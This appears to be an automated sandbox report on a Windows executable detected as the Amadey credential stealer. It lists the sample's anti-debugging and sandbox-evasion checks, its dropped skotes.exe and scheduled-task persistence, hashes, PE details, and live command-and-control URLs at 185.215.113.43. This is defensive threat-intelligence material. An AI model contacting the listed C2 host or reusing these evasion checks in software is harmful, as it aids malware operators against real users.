                    Hides threads from debuggers
                    Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread information set: HideFromDebuggerJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread information set: HideFromDebuggerJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread information set: HideFromDebuggerJump to behavior
                    Tries to detect sandboxes and other dynamic analysis tools (window names)
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeOpen window title or class name: regmonclass
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeOpen window title or class name: gbdyllo
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeOpen window title or class name: procmon_window_class
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeOpen window title or class name: ollydbg
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeOpen window title or class name: filemonclass
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: NTICE
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: SICE
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: SIWVID
                    Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04F10566 rdtsc 0_2_04F10566
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 5_2_0075652B mov eax, dword ptr fs:[00000030h]5_2_0075652B
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 5_2_0075A302 mov eax, dword ptr fs:[00000030h]5_2_0075A302
                    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
                    Source: skotes.exeBinary or memory string: h!Program Manager
                    Source: file.exe, 00000000.00000002.1463759755.00000000006EE000.00000040.00000001.01000000.00000003.sdmp, skotes.exe, 00000002.00000002.1497859902.000000000091E000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000003.00000002.1507190175.000000000091E000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: h!Program Manager
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 5_2_0073D3E2 cpuid 5_2_0073D3E2
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 5_2_0073CBEA GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,5_2_0073CBEA
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 5_2_007265E0 LookupAccountNameA,5_2_007265E0

                    Stealing of Sensitive Information

                    barindex
                    Yara detected Amadeys stealer DLL
                    Source: Yara matchFile source: 3.2.skotes.exe.720000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.skotes.exe.720000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.skotes.exe.720000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.file.exe.4f0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000002.00000002.1497759494.0000000000721000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.2654348620.0000000000721000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.1423354567.0000000004CF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000003.1466497850.0000000004F20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000003.1457117559.00000000049A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.1507039683.0000000000721000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000003.1611788887.0000000004970000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1463607272.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                    Command and Scripting Interpreter                    		1
                    Scheduled Task/Job                    		12
                    Process Injection                    		1
                    Masquerading                    		OS Credential Dumping1
                    System Time Discovery                    		Remote Services1
                    Archive Collected Data                    		1
                    Encrypted Channel                    		Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault Accounts1
                    Scheduled Task/Job                    		1
                    DLL Side-Loading                    		1
                    Scheduled Task/Job                    		251
                    Virtualization/Sandbox Evasion                    		LSASS Memory741
                    Security Software Discovery                    		Remote Desktop ProtocolData from Removable Media1
                    Ingress Tool Transfer                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                    DLL Side-Loading                    		12
                    Process Injection                    		Security Account Manager2
                    Process Discovery                    		SMB/Windows Admin SharesData from Network Shared Drive1
                    Non-Application Layer Protocol                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
                    Obfuscated Files or Information                    		NTDS251
                    Virtualization/Sandbox Evasion                    		Distributed Component Object ModelInput Capture11
                    Application Layer Protocol                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
                    Software Packing                    		LSA Secrets1
                    Application Window Discovery                    		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                    DLL Side-Loading                    		Cached Domain Credentials1
                    Account Discovery                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync1
                    System Owner/User Discovery                    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
                    File and Directory Discovery                    		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow224
                    System Information Discovery                    		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    file.exe100%AviraTR/Crypt.TPM.Gen
                    file.exe100%Joe Sandbox ML

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe100%AviraTR/Crypt.TPM.Gen
                    C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe50%ReversingLabsWin32.Packed.Themida

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    No Antivirus matches

                    URLs

                    SourceDetectionScannerLabelLink
                    http://185.215.113.43/Zu7JuNko/index.phpncodedH100%Avira URL Cloudmalware
                    http://185.215.113.43/Zu7JuNko/index.php%100%Avira URL Cloudmalware
                    http://185.215.113.43/8100%Avira URL Cloudmalware
                    http://185.215.113.43/Zu7JuNko/index.phpE100%Avira URL Cloudmalware
                    http://185.215.113.43/Zu7JuNko/index.phpncodedo100%Avira URL Cloudmalware

                    Domains and IPs

                    Contacted Domains

                    No contacted domains info

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    http://185.215.113.43/Zu7JuNko/index.phpfalse
                      		high

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://185.215.113.43/Zu7JuNko/index.php5skotes.exe, 00000005.00000002.2657383555.0000000000D5D000.00000004.00000020.00020000.00000000.sdmpfalse
                        		high
                        http://185.215.113.43/Zu7JuNko/index.php4skotes.exe, 00000005.00000002.2657383555.0000000000D42000.00000004.00000020.00020000.00000000.sdmpfalse
                          		high
                          http://185.215.113.43/Zu7JuNko/index.phpncodedHskotes.exe, 00000005.00000002.2657383555.0000000000D42000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: malware
                          		unknown
                          http://185.215.113.43/Zu7JuNko/index.phpyskotes.exe, 00000005.00000002.2657383555.0000000000D5D000.00000004.00000020.00020000.00000000.sdmpfalse
                            		high
                            http://185.215.113.43/Zu7JuNko/index.phpZskotes.exe, 00000005.00000002.2657383555.0000000000D5D000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high
                              http://185.215.113.43/Zu7JuNko/index.phpXskotes.exe, 00000005.00000002.2657383555.0000000000D42000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                http://185.215.113.43/Zu7JuNko/index.php%skotes.exe, 00000005.00000002.2657383555.0000000000D42000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: malware
                                		unknown
                                http://185.215.113.43/Zu7JuNko/index.phpEskotes.exe, 00000005.00000002.2657383555.0000000000D5D000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: malware
                                		unknown
                                http://185.215.113.43/Zu7JuNko/index.phpdedskotes.exe, 00000005.00000002.2657383555.0000000000D42000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high
                                  http://185.215.113.43/Zu7JuNko/index.phpdskotes.exe, 00000005.00000002.2657383555.0000000000D42000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high
                                    http://185.215.113.43/Zu7JuNko/index.phpncodedskotes.exe, 00000005.00000002.2657383555.0000000000D42000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      http://185.215.113.43/8skotes.exe, 00000005.00000002.2657383555.0000000000D28000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: malware
                                      		unknown
                                      http://185.215.113.43/Zu7JuNko/index.php(skotes.exe, 00000005.00000002.2657383555.0000000000D42000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        http://185.215.113.43/Zu7JuNko/index.phphskotes.exe, 00000005.00000002.2657383555.0000000000D5D000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          http://185.215.113.43/Zu7JuNko/index.phpLskotes.exe, 00000005.00000002.2657383555.0000000000D42000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            http://185.215.113.43/Zu7JuNko/index.phpncodedoskotes.exe, 00000005.00000002.2657383555.0000000000D42000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: malware
                                            		unknown
                                            http://185.215.113.43/Zu7JuNko/index.phppskotes.exe, 00000005.00000002.2657383555.0000000000D42000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high

                                              World Map of Contacted IPs

                                              • No. of IPs < 25%
                                              • 25% < No. of IPs < 50%
                                              • 50% < No. of IPs < 75%
                                              • 75% < No. of IPs

                                              Public IPs

                                              IPDomainCountryFlagASNASN NameMalicious
                                              185.215.113.43
                                              		unknownPortugal
                                              		206894WHOLESALECONNECTIONSNLtrue

                                              General Information

                                              Joe Sandbox version:41.0.0 Charoite
                                              Analysis ID:1561043
                                              Start date and time:2024-11-22 17:11:47 +01:00
                                              Joe Sandbox product:CloudBasic
                                              Overall analysis duration:0h 6m 47s
                                              Hypervisor based Inspection enabled:false
                                              Report type:full
                                              Cookbook file name:default.jbs
                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                              Number of analysed new started processes analysed:10
                                              Number of new started drivers analysed:0
                                              Number of existing processes analysed:0
                                              Number of existing drivers analysed:0
                                              Number of injected processes analysed:0
                                              Technologies:
                                              • HCA enabled
                                              • EGA enabled
                                              • AMSI enabled
                                              Analysis Mode:default
                                              Analysis stop reason:Timeout
                                              Sample name:file.exe
                                              Detection:MAL
                                              Classification:mal100.troj.spyw.evad.winEXE@5/3@0/1
                                              EGA Information:
                                              • Successful, ratio: 25%
                                              HCA Information:Failed
                                              Cookbook Comments:
                                              • Found application associated with file extension: .exe

                                              Warnings

                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                              • Execution Graph export aborted for target file.exe, PID 7412 because it is empty
                                              • Execution Graph export aborted for target skotes.exe, PID 7656 because there are no executed function
                                              • Execution Graph export aborted for target skotes.exe, PID 7772 because there are no executed function
                                              • Not all processes where analyzed, report is missing behavior information
                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                              • VT rate limit hit for: file.exe

                                              Simulations

                                              Behavior and APIs

                                              TimeTypeDescription
                                              11:13:02API Interceptor2295293x Sleep call for process: skotes.exe modified
                                              17:12:45Task SchedulerRun new task: skotes path: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

                                              Joe Sandbox View / Context

                                              IPs

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              185.215.113.43file.exeGet hashmaliciousLummaC, Amadey, CredGrabber, Credential Flusher, Cryptbot, LummaC Stealer, Meduza StealerBrowse
                                              • 185.215.113.43/Zu7JuNko/index.php
                                              file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                              • 185.215.113.43/Zu7JuNko/index.php
                                              file.exeGet hashmaliciousAmadey, CryptbotBrowse
                                              • 185.215.113.43/Zu7JuNko/index.php
                                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                              • 185.215.113.43/Zu7JuNko/index.php
                                              Tygvfe21rw.exeGet hashmaliciousAmadeyBrowse
                                              • 185.215.113.43/Zu7JuNko/index.php
                                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                              • 185.215.113.43/Zu7JuNko/index.php
                                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                              • 185.215.113.43/Zu7JuNko/index.php
                                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                              • 185.215.113.43/Zu7JuNko/index.php
                                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                              • 185.215.113.43/Zu7JuNko/index.php
                                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                              • 185.215.113.43/Zu7JuNko/index.php

                                              Domains

                                              No context

                                              ASNs

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousLummaC StealerBrowse
                                              • 185.215.113.16
                                              file.exeGet hashmaliciousLummaCBrowse
                                              • 185.215.113.16
                                              file.exeGet hashmaliciousStealcBrowse
                                              • 185.215.113.206
                                              file.exeGet hashmaliciousLummaCBrowse
                                              • 185.215.113.16
                                              file.exeGet hashmaliciousStealcBrowse
                                              • 185.215.113.206
                                              file.exeGet hashmaliciousLummaC, Amadey, CredGrabber, Credential Flusher, Cryptbot, LummaC Stealer, Meduza StealerBrowse
                                              • 185.215.113.206
                                              file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                              • 185.215.113.206
                                              file.exeGet hashmaliciousStealcBrowse
                                              • 185.215.113.206
                                              file.exeGet hashmaliciousAmadey, CryptbotBrowse
                                              • 185.215.113.43
                                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                              • 185.215.113.206

                                              JA3 Fingerprints

                                              No context

                                              Dropped Files

                                              No context

                                              Created / dropped Files

                                              C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

                                              Download File
                                              Process:C:\Users\user\Desktop\file.exe
                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                              Category:dropped
                                              Size (bytes):1922048
                                              Entropy (8bit):7.952724659681467
                                              Encrypted:false
                                              SSDEEP:49152://TTxdTbrxgYihAr5xkWqG8E/N3SEry5RUuzen3lBsVL9t:/7TxZb0qrd9ucB8
                                              MD5:9DDBAC8AABA1C5BB2F9A22717A60A6BA
                                              SHA1:16712810FCF1BB9C7F1940AF8E2E59B92F4A7B65
                                              SHA-256:EDEC375A0EF3CE9E3067AA661E9E32FEE7CBA13FF4F3C7AB69D6DB8D7B22B03D
                                              SHA-512:05D112DAD0D496F825ED88C18D7C196432994F5CCCA9F6F1E098D6376D56C1AA98D8C47E9542ACFE2A53672802E89E68257F607B843E4EBDBD38CD44F1DDBDDD
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: Avira, Detection: 100%
                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                              • Antivirus: ReversingLabs, Detection: 50%
                                              Reputation:low
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C.........................PE..L....V.f.............................@L...........@..........................pL...........@.................................W...k.......H....................%L..............................%L..................................................... . ............................@....rsrc...H...........................@....idata ............................@... .@+.........................@...hockpqtz.@....1..6..................@...wxulotut.....0L.....................@....taggant.0...@L.."...2..............@...................................................................................................................................................................................................................

                                              C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe:Zone.Identifier

                                              Download File
                                              Process:C:\Users\user\Desktop\file.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:modified
                                              Size (bytes):26
                                              Entropy (8bit):3.95006375643621
                                              Encrypted:false
                                              SSDEEP:3:ggPYV:rPYV
                                              MD5:187F488E27DB4AF347237FE461A079AD
                                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                              Malicious:true
                                              Reputation:high, very likely benign file
                                              Preview:[ZoneTransfer]....ZoneId=0

                                              C:\Windows\Tasks\skotes.job

                                              Download File
                                              Process:C:\Users\user\Desktop\file.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):290
                                              Entropy (8bit):3.4550330736255077
                                              Encrypted:false
                                              SSDEEP:6:HkZakxlVX7L1UEZ+lX1CGdKUe6tkHs+Zgty0lBzlre1lEt0:EvN7BQ1CGAFBZgtVBzhqut0
                                              MD5:4DA68D6978AF41417F9EFDC8E58B4C76
                                              SHA1:E158C107491DA13BB59F5B031919DFB7A59D0FE1
                                              SHA-256:C7F807BCE7C14302B3E21306161CF314DD6D92F4383953ECDF41435C041BFCD9
                                              SHA-512:EC13B9F3D821FA1DE4A861A3C739D66693257B19C5011C067F41567D04C25F8C04EA3CD8E321115E2455DFB598A95770A0771F3B71274D88C4D8BB2F42C483A1
                                              Malicious:false
                                              Reputation:low
                                              Preview:.......yx..K...IW...F.......<... .....s.......... ....................9.C.:.\.U.s.e.r.s.\.h.u.b.e.r.t.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.a.b.c.3.b.c.1.9.8.5.\.s.k.o.t.e.s...e.x.e.........H.U.B.E.R.T.-.P.C.\.h.u.b.e.r.t...................0...................@3P.........................

                                              Static File Info

                                              General

                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                              Entropy (8bit):7.952724659681467
                                              TrID:
                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                              • DOS Executable Generic (2002/1) 0.02%
                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                              File name:file.exe
                                              File size:1'922'048 bytes
                                              MD5:9ddbac8aaba1c5bb2f9a22717a60a6ba
                                              SHA1:16712810fcf1bb9c7f1940af8e2e59b92f4a7b65
                                              SHA256:edec375a0ef3ce9e3067aa661e9e32fee7cba13ff4f3c7ab69d6db8d7b22b03d
                                              SHA512:05d112dad0d496f825ed88c18d7c196432994f5ccca9f6f1e098d6376d56c1aa98d8c47e9542acfe2a53672802e89e68257f607b843e4ebdbd38cd44f1ddbddd
                                              SSDEEP:49152://TTxdTbrxgYihAr5xkWqG8E/N3SEry5RUuzen3lBsVL9t:/7TxZb0qrd9ucB8
                                              TLSH:B095331B4D03900EDE6E99F7B89691011BB57DE450370E2CF6126FAEB49BD437BC9046
                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C................

                                              File Icon

                                              Icon Hash:00928e8e8686b000

                                              Static PE Info

                                              General

                                              Entrypoint:0x8c4000
                                              Entrypoint Section:.taggant
                                              Digitally signed:false
                                              Imagebase:0x400000
                                              Subsystem:windows gui
                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                              DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                              Time Stamp:0x66F0569C [Sun Sep 22 17:40:44 2024 UTC]
                                              TLS Callbacks:
                                              CLR (.Net) Version:
                                              OS Version Major:6
                                              OS Version Minor:0
                                              File Version Major:6
                                              File Version Minor:0
                                              Subsystem Version Major:6
                                              Subsystem Version Minor:0
                                              Import Hash:2eabe9054cad5152567f0699947a2c5b

                                              Entrypoint Preview

                                              Instruction
                                              jmp 00007FD0F8B2A1EAh
                                              rdmsr
                                              sbb eax, 00000000h
                                              add cl, ch
                                              add byte ptr [eax], ah
                                              add byte ptr [eax], al
                                              add byte ptr [edx+ecx], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              xor byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al

                                              Data Directories

                                              NameVirtual AddressVirtual Size Is in Section
                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x6a0570x6b.idata
                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x690000x448.rsrc
                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x4c25e00x10hockpqtz
                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                              IMAGE_DIRECTORY_ENTRY_TLS0x4c25900x18hockpqtz
                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                              Sections

                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                              0x10000x680000x2de0047184781327aec90abd485996304b652False0.9983874744550408data7.988291086573797IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                              .rsrc0x690000x4480x60023f61aeefa7c3d30c07a21aa8f45e969False0.3053385416666667data5.28505835027857IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                              .idata 0x6a0000x10000x200cc76e3822efdc911f469a3e3cc9ce9feFalse0.1484375data1.0428145631430756IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                              0x6b0000x2b40000x200f77c1e6cc74467e1867c1cbd3a1dbadeunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                              hockpqtz0x31f0000x1a40000x1a3600b5b3d3a509654cb859ca7cc2c0e03ae3False0.9949597149776453data7.955305476537546IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                              wxulotut0x4c30000x10000x4006f2f075218be009fe47629f92eac9e0eFalse0.8330078125data6.337693953949785IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                              .taggant0x4c40000x30000x2200c99628bca6e4e84e2b12c518feaa2d2aFalse0.0625DOS executable (COM)0.7414169167298413IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                              Resources

                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                              RT_MANIFEST0x690700x256ASCII text, with CRLF line terminators0.5100334448160535
                                              RT_MANIFEST0x692c80x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5931758530183727

                                              Imports

                                              DLLImport
                                              kernel32.dlllstrcpy

                                              Possible Origin

                                              Language of compilation systemCountry where language is spokenMap
                                              EnglishUnited States

                                              Network Behavior

                                              Suricata IDS Alerts

                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                              2024-11-22T17:13:25.472364+01002856147ETPRO MALWARE Amadey CnC Activity M31192.168.2.849714185.215.113.4380TCP

                                              Network Port Distribution

                                              TCP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Nov 22, 2024 17:13:05.436768055 CET4970880192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:13:05.556304932 CET8049708185.215.113.43192.168.2.8
                                              Nov 22, 2024 17:13:05.556543112 CET4970880192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:13:05.556982994 CET4970880192.168.2.8185.215.113.43
                                              Nov 22, 2024 17:13:05.676459074 CET8049708185.215.113.43192.168.2.8
                                              Nov 22, 2024 17:13:06.989620924 CET8049708185.215.113.43192.168.2.8
